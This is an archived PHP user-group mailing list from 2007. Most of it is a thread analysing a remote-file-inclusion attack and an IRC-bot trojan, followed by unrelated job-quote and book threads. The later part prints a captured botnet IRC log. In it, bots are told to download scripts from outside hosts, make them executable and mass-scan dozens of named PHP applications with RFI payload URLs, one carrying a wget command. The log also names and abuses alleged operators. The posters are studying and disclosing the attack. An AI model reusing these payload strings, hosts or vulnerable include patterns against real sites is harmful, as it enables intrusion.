[phpug] Hack attempt
Nick Taylor
Hello folks
Thought some of you might be interested in this
http://amyru.h18.ru/images/cs.txt
which is a php file that someone has tried to hack one of my sites with
as in
pageID=http://amyru.h18.ru/images/cs.txt
Any idea what this does?
Cameron Junge
A quick perusal is that it's a trojan that allows remote commands. It pings a remote host on a specific port I believe, which is probably a trigger. It uses base64 and various obfuscation techniques to make it difficult to reverse engineer it. Might have a look this arvo :) Cameron -----Original Message----- From: nzp...@googlegroups.com [mailto:nzp...@googlegroups.com] On Behalf Of Nick Taylor Sent: Tuesday, 2 October 2007 4:53 p.m. To: nzp...@googlegroups.com
Jochen Daum
He was just checking, if you go
fopen ($_GET['pageID']);
or if you compare it against a list fo allowed files or local files.
Does it open?
HTH, Jochen
razza
ontop of running each virtualhost under their own userid/group.
Looks like it tries to make a simple webshell to me? no doubt as an attack
vector to compromise further.
Robert
On Tue, 02 Oct 2007 15:53:20 +1200, Nick Taylor wrote
> !DSPAM:4701b2ec185143497918079!
--
Cameron Junge
Ah nice… has a built in IRC client that joins a channel (haven’t decoded that yet…)
Nick Taylor
>
> fopen ($_GET['pageID']);
>
> or if you compare it against a list fo allowed files or local files.
>
> Does it open?
Errm... I'm missing something.
What do I do with fopen($_GET['pageID']);
and
If I compare what agains a list of allowed or local files? pageID? If so
how?
For what it's worth, I force pageID to integer before it gets to any
other code.
Nick
Cameron Junge
(in this case it's the bot file) and then it'll Trojan your machine.
A good reason to always filter input and escape output!
Cameron
-----Original Message-----
From: nzp...@googlegroups.com [mailto:nzp...@googlegroups.com] On
Behalf Of Nick Taylor
Sent: Tuesday, 2 October 2007 6:10 p.m.
To: nzp...@googlegroups.com
Jochen Daum
Thats what I expected. Some people might simply allow a file name that
they open without checking. I assumed it is a bot that just tries that.
HTH, Jochen
Dmitry Ruban
I did some research, seems that this is simple IRC client which connects
randomly to one of this hosts (port 8080):
we3nlethland.weedns.com
pmununvbernum.weedns.com
webnlhttp0x0.weedns.com
ns10.optus.nu
ns11.optus.nu
ns12.optus.nu
ns13.optus.nu
h0s0s00we0r0w0w.cjb.net
d0d0sjsdjkjkl2jsjkdfsdf.cjb.net
p3pweriouwer234234jkhkjhjkshda.cjb.net
02.privserver.com
p.myfoobar.info
joins channel ##p and listening for commands.
> Hello folks
> http://amyru.h18.ru/images/cs.txt
> pageID=http://amyru.h18.ru/images/cs.txt
--
Best regards,
Dmitry mailto:dmi...@ruban.biz
Jevon Wright
vunerable.php
<?php
include($pageID . ".php");
// normal code...
?>
then all you have to call is /vunerable.php?pageID=http://evilsite.com/hack...
It's more common than you'd hope! Especially for help pages or index.php? type redirects...
Jevon
Nick
http://amyru.h18.ru/images/cs.txt.php
gives me 404 when I type it in my browser
;-)
Nick
had the php file there then yea, but you'd also need to turn on remote
includes / allow remote includes wouldn't you?
Stig Manning
bored...). I will attempt to attach to this email, you can email me if
you want to get a copy otherwise.
I discovered that you cannot log in to the bots unless you have the
letters 'av' in your host name. He meant to make it so you couldn't log
in without having a host name ending in .av but failed in his regular
expression.
If you have 'av' anywhere in your hostname feel free to go and turn all
of his bots off ("d1enow" is the command)!
However be careful as I attempted to play around with the bots but got
found out pretty quick and then was DDoSd pretty hard.
Regards,
Stig
--
Stig Manning
BECom (Technology)
Lead Developer
Blink Interactive
The Loft, 201 Hobson St, Auckland
(09) 377 5663 / (021) 0331000
http://www.blinkinteractive.co.nz
razza
On Thu, 04 Oct 2007 13:16:37 +1200, Stig Manning wrote
> !DSPAM:470430e1165791238162646!
--
Steven Morey
I have got to a stage where I finally require some work to begin. The issue
is this is possible the most complicated stuff I have had built so I need
someone who has all round experience with coding.
A simple spec of what we need done is below:
Background on the current system.
Currently we provide an online postal system. Where we receive physical
letters. The letters can be controlled online. Such as forwarding to a new
physical location or destroyed.
The website is hosted on our VPS up in Auckland, and currently everything is
done online through our php scripts. Unfortunately my developer has left and
can't do any more work, so I need someone who has the expertise to develop
my system further.
Work that needs to be done.
We want to implement a mail scanning service. This is where instead of
actually forwarding the items, we scan the documents and the customer
receives the letters via email or through the online system. This can be in
PDF format or in JPG.
Now there are two options, where the images are read online thought our
secure web panel. Or they are simply emailed to the customer.
To be able to identify each scanned document when the email is sent or file
viewed the specific date must be passed to the customer (cost, no of pages
e.t.c..)
I want little admin time as possible, as this service may get very busy and
quick and accurate turnaround is very important!
Now as there are a few options I would like to consider the following
options:
A, use my copier 'scan to email' function. What it does is, when I hit the
scan button, the scanner will popup outlook and insert the image as a PDF.
This is great and simple but requires allot of admin, as I will have to
manually enter in the email address and the details of the scanned document.
C, Scan the documents and upload them to my server. The system can input
the data associated with the item to the user. It can either email the
images or post them in the customers secure account.
The issue I can see with this with this is uploading images to the server...
and will take some admin to locate the files once scanned and upload them.
D, This is the option I like... Develop a program that has access to my
scanner via the Twain protocol and also has SSL access to my DB. Thus it can
process the queue remotely on my pc, (I'll buy a UNIX box if you want it
done this way)
As the program has access to the DB, it can process it all for me like it is
currently done online. (Emailing it from the box or uploading to the members
area)
But there are two options for this...
1, The system will email the documents to the customer with the order info
in the email (user ID and cost e.t.c)
2, Set the box up as a content server, whereby instead of uploading directly
to the server (which takes time). The Box can be used as a content server
and the customer can read the mail online. Each time they login to the
account to access the PDF or JPG the online system will access my remote
server and download the remote files from my server at our office.
I know it may seem like a lot of work, but if someone who is competent in
this type of work can get back to me, I would very much appreciate it.
Cheers,
Steven Morey
Private Box
Aaron Cooper
"D, This is the option I like... Develop a program that has access to my
scanner via the Twain protocol and also has SSL access to my DB. Thus it can
process the queue remotely on my pc, (I'll buy a UNIX box if you want it
done this way)"
I think you might be better looking for a VB/C/.NET developer for this part
of the job. Java may be an option as I'm sure there's a Twain API available
for it.
Needless to say, I think you are looking for a stand-alone desktop app for
this (major) portion of the project. Not a web technology like PHP.
The linking of documents to user accounts could be resonably acheived with a
good naming convention and have your new site poll a certain directory(ies)
and take action on files based on user id/name etc.
Regards
Aaron
Julian Melville
> for this (major) portion of the project. Not a web technology like PHP.
Yep. This, for example: http://www.ezescan.com.au/
From the sound of what you were describing, it sounds like a good fit.
Cheers,
Julian.
Lee Aholima
mail to from the physical mail (envelope) ? OCR? Do you have some code for
this or software plugin to do this?
Regards
L
----- Original Message -----
From: "Steven Morey" <st...@morey.co.nz>
To: <nzp...@googlegroups.com>
Sent: Friday, October 05, 2007 12:09 PM
Subject: [phpug] Job Quote Request.
steven morey
OCR is not an option, as its inaccurate and will not read hand writing.
there are many plugins for this type of job. it's just which one suits the
developer.
Cheers,
Steven.
Lee Aholima
Assuming that you have something to read the customer details from the
envelope (OCR)?
I think it is possible to do this using the following setup...
Microsoft Access.
Twain api (dll).
SQL Server express (email via smtp dll) - you just need to provide a smtp
server.
you could probably convert to pdf as well
With microsoft access I think from memory if you don't have it you can
purchase/install a runtime engine to run your microsoft access application
rather than having microsoft access.
I have worked with something similar at a company I worked for in the past
and did a proof of concept not so long ago converting invoices
electronically generated, to pdf and emailing them via smtp, for another
customer. He went broke and owed me money for this so I never got to test
out the application in a live environment.
----- Original Message -----
From: "Steven Morey" <st...@morey.co.nz>
To: <nzp...@googlegroups.com>
Sent: Friday, October 05, 2007 12:09 PM
Subject: [phpug] Job Quote Request.
Lee Aholima
for.
Regards
L
----- Original Message -----
From: "Lee Aholima" <lee-a...@dayfive.co.nz>
To: <nzp...@googlegroups.com>
Sent: Friday, October 05, 2007 10:56 PM
Subject: [phpug] Re: Job Quote Request.
>
Nick Taylor
Ha ha - fantastic. I tried this myself and got as far as the trim()
function... and then had a sort of existential crisis so left it at that.
> ------------------------------------------------------------------------
>
> No virus found in this incoming message.
> Checked by AVG Free Edition.
> Version: 7.5.488 / Virus Database: 269.14.0/1048 - Release Date: 03/10/2007 20:22
Richard Vowles
>
> Hi Steven,
>
> Assuming that you have something to read the customer details from the
> envelope (OCR)?
>
> I think it is possible to do this using the following setup...
>
> Microsoft Access.
> Twain api (dll).
> SQL Server express (email via smtp dll) - you just need to provide a
> smtp server.
> you could probably convert to pdf as well
>
> With microsoft access I think from memory if you don't have it you can
> purchase/install a runtime engine to run your microsoft access
> application rather than having microsoft access.
package. Really, VS.NET or Delphi is the way to go with this, steer well
clear of Access, it is an end-user querying tool not a software
development tool.
Richard
Steven Morey
Thank you all for your input.
I have taken all your suggestions into consideration, as I have a current
system I have been advised to re-write the entire thing.
Whilst this may seem appealing to anyone who wishes to work on it, I am
unsure if I want to go though the whole process of getting my program
re-written.
I feel that the best option may be a desktop application that downloads the
processing information, scans the documents and emails the PDF documents to
the customer Via my SMTP server. I do not want to consider OCR as it is
complicated and unreliable.
My preference is for someone in Wellington, and I want to get this job
underway and completed before the years end. so please let know know if your
keen.
Cheers,
Steven Morey
Private Box
----- Original Message -----
From: "Richard Vowles" <ric...@developers-inc.co.nz>
To: <nzp...@googlegroups.com>
Sent: 8 October 2007 9:58 AM
Subject: [phpug] Re: Job Quote Request.
Nick
Anyone have any recommendations for a PHP OOP book / e-course / video set?
Cheers
:-)
anru chen
http://www.amazon.com/PHP-5-Objects-Patterns-Practice/dp/1590593804,
viewer comments seems really good.
regards.
Grant Paton-Simpson
and there is a lot in there.
--
___________________________________
Dr Grant Paton-Simpson
Director, Paton-Simpson & Associates Ltd
16 Summit Drive, Mt Albert, Auckland 1025
(09) 849-6696
(09) 849-6699
___________________________________
an...@dandydesigns.co.nz
http://www.amazon.com/Power-Programming-Bruce-Perens-Source/dp/013147149X
it's available for free download on pdf, just google for it.
Aaron Cooper
I lent it to a colleage who was a PHP novice (actionscript developer) and
his exact words were "very easy to follow".
Aaron
Trevor Ulyatt
http://www.takhleeq.net/download/013147149X_book.pdf
-----Original Message-----
From: nzp...@googlegroups.com [mailto:nzp...@googlegroups.com] On
Behalf Of An...@DandyDesigns.co.nz
Sent: 8 October 2007 3:29 p.m.
To: nzp...@googlegroups.com
Subject: [phpug] Re: Decent PHP OOP books
Nick
Yea I found this yesterday and started reading it - already picked up a
couple of really simple things which are useful
Thanks for that :-)
lee-a...@dayfive.co.nz
Just one question - how would you obtain the addressee information from
the envelope. Okay so scanning the letter or posted document would deal
with getting an electronic copy of the letter (document) but how would you
be able to obtain the addressee (sender too?) if you are not using OCR?
This is the bit that I don't understand assuming that the mail is a
physical envelope etc.
Regards
Lee Aholima
Mob 027 4313292
Steven Morey
With the existing system we manually type this in. They can already see
their mail in itemsed format.
I think we have found a Plugin that will be suited to our needs, the only
issues is finding someone who is able to write the php for it.
Cheers,
Steven.
brianegge
must be effective, as they keep repeating. My shared host has
SecFilterEngine on by default, which will stop the script dead.
Unfortunately, I maintain a wiki of code tips, and I often have to
include commands in my code. So, I've turned off SecFilterEngine. I
found I could add this to my LocalSettings.php, and it seem to prevent
the bad URLS.
//http and https should not be used in any query string
if (eregi('http', $_SERVER['QUERY_STRING']) || eregi('https',
$_SERVER['QUERY_STRING'])) {
header('Location: http://' . $_SERVER['SERVER_NAME']);
exit;
}
I'm surprised that I'm getting an attack, as I'm running PHP 5.2.3 and
MediaWiki 1.10.1. My host seems to have the other things you expect
like allow_url_fopen turned off.
Any ideas on how to further protect my site?
Ivan
I've managed to capture something ;)
This session was captured between 31.10.07 to 01.11.07.
NOTE: I'm leaving all ip's (except mine) untouched, in hope their
admins will see it and clean their servs.
These peoples probably responsible for all scans and attacks, in which
"*.h18.ru/images/cs.txt" was seen.
Here we go:
--------- START ---------------
xx.xx.xx.xx.xxxx-202.181.099.073.xxxx: JOIN ##p md5hash
MODE gagaqgwia -x i
JOIN ##p md5hash
202.181.099.073.xx.xx.xx.xx.54658: :gfefshea!qtyarjtrk@***hi!
***it's****me**** JOIN :##p
202.181.099.073.xx.xx.xx.xx.54658: :w!0...@nav.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :w!0...@nav.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :w!0...@nav.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Quit:
connection reset by queer
202.181.099.073.xx.xx.xx.xx.54658: :w!0...@nav.av QUIT :Killed (db (rat))
<====== pls, note this ;)
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Ping timeout
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Ping timeout
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Ping timeout
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*get
http://membres.lycos.fr/x03/g.txt /var/tmp/g.php -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*get
http://membres.lycos.fr/x03/a.txt /var/tmp/a.php -s
:db!0x...@n.av PRIVMSG ##p :*get http://membres.lycos.fr/x03/m.txt /
var/tmp/m.php -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*chmod /
var/tmp/g.php +x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*chmod /
var/tmp/a.php +x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*chmod /
var/tmp/m.php +x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "Powered+by+SocketMail" /mail/content/fnc-
readmail3.php?__SOCKETMAIL_ROOT=http://holegirl.h18.ru/images/cs.txt?
5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :Ping timeout
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php "Powered+by+phpFaber+URLInn" /urlinn_includes/
config.php?dir_ws=http://holegirl.h18.ru/images/cs.txt? 5 8 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php main.php? /pages/main.php?pg=http://holegirl.h18.ru/
images/cs.txt? 5 90 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/a.php main.php? /pages/
main.php?pg=http://holegirl.h18.ru/images/cs.txt? 5 90 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/g.php inurl:main.php?
pg= /pages/main.php?pg=http://holegirl.h18.ru/images/cs.txt? 5 9 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :cmd
php /var/tmp/m.php "Sistema+Integral+de+Gestion" /inc/sige_init.php?
SYS_PATH=http://holegirl.h18.ru/images/cs.txt? 5 90 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :cmd
php /var/tmp/m.php Sistema+Integral+de+Gestion /inc/sige_init.php?
SYS_PATH=http://holegirl.h18.ru/images/cs.txt? 5 90 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php breadcrumb.php? /_theme/breadcrumb.php?
rootBase=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php breadcrumb.php? /_theme/breadcrumb.php?
rootBase=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/g.php inurl:_theme/
breadcrumb.php?rootBase= /_theme/breadcrumb.php?rootBase=http://
holegirl.h18.ru/images/cs.txt? 5 5 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php Powered+by+CaupoShop+Pro /shop/index.php?
action=http://holegirl.h18.ru/images/cs.txt? 5 2 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php Powered+by+CaupoShop+Pro /shop/index.php?
action=http://holegirl.h18.ru/images/cs.txt? 5 90 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php Powered+by
+CaupoShop+Pro /shop/index.php?action=http://holegirl.h18.ru/images/
cs.txt? 5 5 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "Powered+by+CaupoShop+Pro" /shop/index.php?
action=http://holegirl.h18.ru/images/cs.txt? 5 5 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php intitle:Powered+by+CaupoShop+Pro /shop/index.php?
action=http://holegirl.h18.ru/images/cs.txt? 5 2 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php intitle:CaupoShop+Pro /shop/index.php?action=http://
holegirl.h18.ru/images/cs.txt? 5 2 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php intitle:CaupoShop+Pro /shop/index.php?action=http://
holegirl.h18.ru/images/cs.txt? 5 8 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php phpSecurePages /phpSecurePages/secure.php?
&cfgProgDir&cmd=wget%20http://holegirl.h18.ru/images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php phpSecurePages /
phpSecurePages/secure.php?&cfgProgDir&cmd=wget%20http://
holegirl.h18.ru/images/cs.txt? 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/a.php phpSecurePages /
phpSecurePages/secure.php?&cfgProgDir&cmd=wget%20http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php "BosMarket+." /bosmarket/account.php?
newEmail=http://holegirl.h18.ru/images/cs.txt? 5 5 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "BosMarket+." /bosmarket/account.php?
newEmail=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/a.php "BosMarket+." /
bosmarket/account.php?newEmail=http://holegirl.h18.ru/images/cs.txt? 5
50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/g.php "IndyLANDLORD" /IndyLANDLORD/2_bedroom.php?
page=http://holegirl.h18.ru/images/cs.txt? 5 5 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php "IndyLANDLORD" /
IndyLANDLORD/2_bedroom.php?page=http://holegirl.h18.ru/images/cs.txt?
5 60 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/a.php "IndyLANDLORD" /
IndyLANDLORD/2_bedroom.php?page=http://holegirl.h18.ru/images/cs.txt?
5 60 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php Copyright+..+2001-2007+awzMB+Project /awzmb/modules/
reg.incl.php?Setting[OPT_includepath]=http://holegirl.h18.ru/images/
cs.txt? 5 50
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php Copyright+..
+2001-2007+awzMB+Project /awzmb/adminhelp.php?
Setting[OPT_includepath]=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/g.php Copyright ..
2001-2007 awzMB Project /awzmb/adminhelp.php?
Setting[OPT_includepath]=http://holegirl.h18.ru/images/cs.txt? 5 5 -s
085.064.207.012.52670-202.181.099.073.08081: PRIVMSG ##p :> [EOF]
202.181.099.073.xx.xx.xx.xx.54658: :ezvgmgpku!
pdac...@www.dataflo.net PRIVMSG ##p :> [EOF]
:nhffzoksk!xiig...@212.100.248.138 PRIVMSG ##p :> Status: 404
:wavfuszwg!tgqu...@devel.money.net PRIVMSG ##p :> Could not open
input file: /var/tmp/a.php.
:wdxdmvryh!jgiu...@2novgroup.com PRIVMSG ##p :> Status: 404
:wavfuszwg!tgqu...@devel.money.net PRIVMSG ##p :> [EOF]
:nhffzoksk!xiig...@212.100.248.138 PRIVMSG ##p :> Content-type: text/
html
:wdxdmvryh!jgiu...@2novgroup.com PRIVMSG ##p :> Content-type: text/
html
:nhffzoksk!xiig...@212.100.248.138 PRIVMSG ##p :> X-Powered-By: PHP/
4.3.2
202.181.099.073.xx.xx.xx.xx.54658: :wdxdmvryh!jgiu...@2novgroup.com
PRIVMSG ##p :> X-Powered-By: PHP/4.3.9
:nhffzoksk!xiig...@212.100.248.138 PRIVMSG ##p :> No input file
specified.
:wdxdmvryh!jgiu...@2novgroup.com PRIVMSG ##p :> No input file
specified.
202.181.099.073.xx.xx.xx.xx.54658: :nhffzoksk!
xiig...@212.100.248.138 PRIVMSG ##p :> [EOF]
:wdxdmvryh!jgiu...@2novgroup.com PRIVMSG ##p :> [EOF]
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "Copyright+..+2001-2007+awzMB+Project" /awzmb/
adminhelp.php?Setting[OPT_includepath]=http://holegirl.h18.ru/images/
cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "Copyright+..+2001-2007+awzMB+Project" /awzmb/
adminhelp.php?Setting[OPT_includepath]=http://holegirl.h18.ru/images/
cs.txt? 5 50 -s
======= OP wars? ;) Goooood! ===============>
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p : ( ely
magers / owner of glowshells.net)
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p : ( ely
magers / owner of glowshells.net is the one whos owned you)
202.181.099.073.xx.xx.xx.xx.54658: :w345!0@0 PRIVMSG ##p :drew basile
202.181.099.073.xx.xx.xx.xx.54658: :w345!0@0 PRIVMSG ##p :you are
stupid
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :hahaha
202.181.099.073.xx.xx.xx.xx.54658: :w345!0@0 TOPIC ##p :
202.181.099.073.xx.xx.xx.xx.54658: :w345!0@0 PRIVMSG ##p :andrew is
fucker
202.181.099.073.xx.xx.xx.xx.54658: :w345!0@0 QUIT :Killed (db (your-
dead))
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p : ( ely
magers / owner of glowshells.net is the one whos owned you)
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av QUIT :*
202.181.099.073.xx.xx.xx.xx.54658: :w34534!0@0 TOPIC ##p :
202.181.099.073.xx.xx.xx.xx.54658: :w34534!0@0 PRIVMSG ##p :andrew
basile is owner of this botnet
202.181.099.073.xx.xx.xx.xx.54658: :w34534!0@0 PRIVMSG ##p :he lives
in melbourne aussie
202.181.099.073.xx.xx.xx.xx.54658: :w34534!0@0 PRIVMSG ##p :get his
ass.
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p :
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :grrr
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :now
your fucking dead.
202.181.099.073.xx.xx.xx.xx.54658: :w34534!0@0 QUIT :Quit: coding.
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p :(ely
magers / owner of glowshells.net is the one whos owned you)
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av TOPIC ##p :
<=========== OP wars End... Bad... ============
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :** x -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php Powered+by+CaupoShop+Pro /shop/index.php?
action=http://holegirl.h18.ru/images/cs.txt? 5 90 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php LimeSurvey /classes/core/language.php?
rootdir=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php You+have+not+provided+a+survey+identification
+number /classes/core/language.php?rootdir=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php "PHPDJ+was+created+by+www.php-mania.co.uk" /
PHPDJ_v05/dj/djpage.php?page=http://holegirl.h18.ru/images/cs.txt? 5
50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php "PHPDJ+was+created+by+www.php-mania.co.uk" /
PHPDJ_v05/dj/djpage.php?page=http://holegirl.h18.ru/images/cs.txt? 5
50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php "awzMB+Project" /
awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php LimeSurvey /classes/core/language.php?
rootdir=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/a.php You+have+not
+provided+a+survey+identification+number /classes/core/language.php?
rootdir=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?cmd=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?c=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?ss=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?sa=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?main=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
:db!0x...@n.av PRIVMSG ##p :*cmd php /var/tmp/m.php index.php? /
index.php?login=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?l=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.*.? /?=http://holegirl.h18.ru/images/cs.txt?
5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php ? /?=http://holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/a.php "?" /?=http://holegirl.h18.ru/images/cs.txt? 5 50 -
s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?register=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?reg=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?about_us=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?aboutus=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?prods=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?prod=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?product=http://
holegirl.h18.ru/images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?global=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
202.181.099.073.xx.xx.xx.xx.54658: :db!0x...@n.av PRIVMSG ##p :*cmd
php /var/tmp/m.php index.php? /index.php?glob=http://holegirl.h18.ru/
images/cs.txt? 5 50 -s
